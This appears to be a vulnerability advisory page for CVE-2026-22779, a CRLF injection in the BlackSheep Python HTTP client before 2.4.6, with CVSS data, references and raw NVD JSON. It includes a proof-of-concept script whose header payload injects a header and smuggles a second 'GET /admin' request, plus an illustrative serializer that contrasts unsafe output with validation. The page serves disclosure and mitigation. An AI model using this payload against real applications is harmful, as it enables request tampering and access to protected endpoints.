Security Vulnerability Report
CVE-2026-22779 CVSS 5.3 MEDIUM


Published: 2026-01-14 17:16:09
Last Modified: 2026-01-22 15:39:32

Description

BlackSheep is an asynchronous web framework for building event-based web applications with Python. Prior to 2.4.6, the HTTP client implementation in BlackSheep is vulnerable to CRLF injection: because header names and values are not validated before being written to the wire, an attacker who controls a header value can modify the outgoing HTTP request (for example, insert an additional header) or even append a second, complete HTTP request. Exploitation requires that the application pass unsanitized user input directly into request headers, which is why the CVSS 4.0 vector carries Attack Requirements: Present. The server side is not affected, because BlackSheep delegates handling of response headers to the underlying ASGI server. This vulnerability is fixed in 2.4.6.

CVSS Details

CVSS Score (CVSS 3.1, primary)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVSS Score (CVSS 4.0, secondary)
6.3
Severity
MEDIUM
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

The two scores differ on where the impact lands: the 3.1 vector records a low integrity impact on the vulnerable component, while the 4.0 vector records no impact on the client itself and a low confidentiality and integrity impact on the subsequent system (the server that receives the smuggled headers or request). AT:P reflects the precondition that the application forwards unsanitized input into headers.

Weakness
CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')

Configurations (Affected Products)

cpe:2.3:a:neoteroi:blacksheep:*:*:*:*:*:python:*:* - VULNERABLE
BlackSheep < 2.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio

# BlackSheep's HTTP client class is ClientSession (blacksheep.client);
# the original snippet imported a `Client` name that the package does not export.
from blacksheep.client import ClientSession


async def crlf_injection_poc():
    """
    CVE-2026-22779 CRLF injection PoC.

    Demonstrates how unsanitized user input in a header value lets an
    attacker append headers, and even a second request line, to the
    request that the BlackSheep HTTP client (< 2.4.6) writes on the wire.
    Point the URL at a listener you control (e.g. `nc -l 8080`) to see
    the injected bytes instead of sending them to a third party. On
    2.4.6 and later, header validation rejects the value rather than
    sending it.
    """
    client = ClientSession()

    # Malicious header value containing CRLF characters: it terminates the
    # legitimate header, injects a new one, ends the header block, and
    # starts a second request.
    malicious_value = "value\r\nX-Injected-Header: malicious\r\n\r\nGET /admin HTTP/1.1"

    try:
        # Vulnerable versions pass the value through to the request
        # serializer without validation. BlackSheep client headers are
        # (bytes, bytes) tuples, so the value is encoded here.
        response = await client.get(
            "http://example.com",
            headers=[(b"X-User-Input", malicious_value.encode("latin-1"))],
        )
        print(f"Response status: {response.status}")
    except Exception as e:
        print(f"Error occurred: {e}")
    finally:
        await client.close()


def sanitize_header_value(user_input: str) -> str:
    """
    Strip CR and LF from user input before it reaches a header.
    Rejecting such input (raising an error) is usually preferable to
    silently altering it, but stripping is enough to defeat injection.
    """
    return user_input.replace("\r", "").replace("\n", "")


if __name__ == "__main__":
    asyncio.run(crlf_injection_poc())
```
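What a client serializer does with that payload, and what the missing validation should have done, as an added example that is neither BlackSheep's code nor the 2.4.6 patch: a minimal hand-rolled HTTP/1.1 request serializer with validation switched off (the pre-2.4.6 behaviour the advisory describes) and on (rejecting every control character that RFC 9110 forbids in a field value, CR and LF included), plus a counter that shows how many requests a keep-alive server would parse out of the resulting bytes. The host name target.internal, the /proxy path and the header names are made up for the demonstration; the payload is constructed to match the PoC above.

```python
"""Added example: CRLF injection through an HTTP client's header serializer.

Hand-rolled, minimal HTTP/1.1 request serializer (not BlackSheep's code and
not the 2.4.6 patch). The unsafe path copies header values verbatim onto the
wire; the validating path rejects the bytes CRLF injection depends on.
"""
import re
from typing import List, Tuple

# RFC 9110 field-name = token = 1*tchar.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# RFC 9110 field-value allows VCHAR, obs-text, SP and HTAB. Every other
# control character (NUL, LF, CR, ...) is forbidden; CR and LF are exactly
# what lets a value terminate one header and start another.
_BAD_VALUE_CHAR = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def validate_header(name: str, value: str) -> None:
    """Raise ValueError for a header that cannot be serialized safely."""
    if not _TOKEN.match(name):
        raise ValueError(f"invalid header name: {name!r}")
    if _BAD_VALUE_CHAR.search(value):
        raise ValueError(f"control character in header value: {value!r}")


def serialize_request(
    method: str,
    path: str,
    host: str,
    headers: List[Tuple[str, str]],
    validate: bool,
) -> bytes:
    """Build the bytes a client would write for one HTTP/1.1 request.

    validate=False mirrors the pre-2.4.6 behaviour the advisory describes:
    whatever the caller passes is copied onto the wire unchanged.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in headers:
        if validate:
            validate_header(name, value)
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def count_requests(wire: bytes) -> int:
    """Count request lines in a byte stream, i.e. how many requests a
    keep-alive server would parse out of what the client sent."""
    return len(re.findall(rb"(?m)^[A-Z]+ \S+ HTTP/1\.[01]\r\n", wire))


# Constructed attacker input, the same shape as the PoC payload: close the
# current header, add one, end the header block, start a second request.
PAYLOAD = "value\r\nX-Injected-Header: malicious\r\n\r\nGET /admin HTTP/1.1"


def demo() -> dict:
    """Run both paths on the same input and report what happened."""
    unsafe = serialize_request(
        "GET", "/proxy", "target.internal", [("X-User-Input", PAYLOAD)], validate=False
    )
    try:
        serialize_request(
            "GET", "/proxy", "target.internal", [("X-User-Input", PAYLOAD)], validate=True
        )
        rejected = False
    except ValueError:
        rejected = True
    return {
        # 2: the original GET /proxy plus the smuggled GET /admin
        "requests_on_wire_unsafe": count_requests(unsafe),
        "injected_header_present": b"\r\nX-Injected-Header: malicious\r\n" in unsafe,
        "rejected_by_validation": rejected,
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

Two points the check above makes that a strip-CR-LF helper does not: the header name is validated too (a name containing a colon or a control character corrupts the request just as a value does), and the input is rejected rather than silently rewritten, so an application forwarding user-controlled headers (a proxy or webhook relay) fails closed and logs the attempt instead of sending a mangled header. Applications that must forward caller-supplied headers should additionally allow-list the header names they forward.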

References

https://github.com/Neoteroi/BlackSheep/commit/bd4ecb9542b5d52442276b5a6907931b90f38d12 (Patch)
https://github.com/Neoteroi/BlackSheep/releases/tag/v2.4.6 (Release Notes)
https://github.com/Neoteroi/BlackSheep/security/advisories/GHSA-6pw3-h7xf-x4gp (Third Party Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-22779", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:09.150", "lastModified": "2026-01-22T15:39:31.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers.The server part is not affected because BlackSheep delegates to an underlying ASGI server handling of response headers. This vulnerability is fixed in 2.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:neoteroi:blacksheep:*:*:*:*:*:python:*:*", "versionEndExcluding": "2.4.6", "matchCriteriaId": "FD85CB64-1BE0-413B-A144-357F606AD016"}]}]}], "references": [{"url": "https://github.com/Neoteroi/BlackSheep/commit/bd4ecb9542b5d52442276b5a6907931b90f38d12", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Neoteroi/BlackSheep/releases/tag/v2.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Neoteroi/BlackSheep/security/advisories/GHSA-6pw3-h7xf-x4gp", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```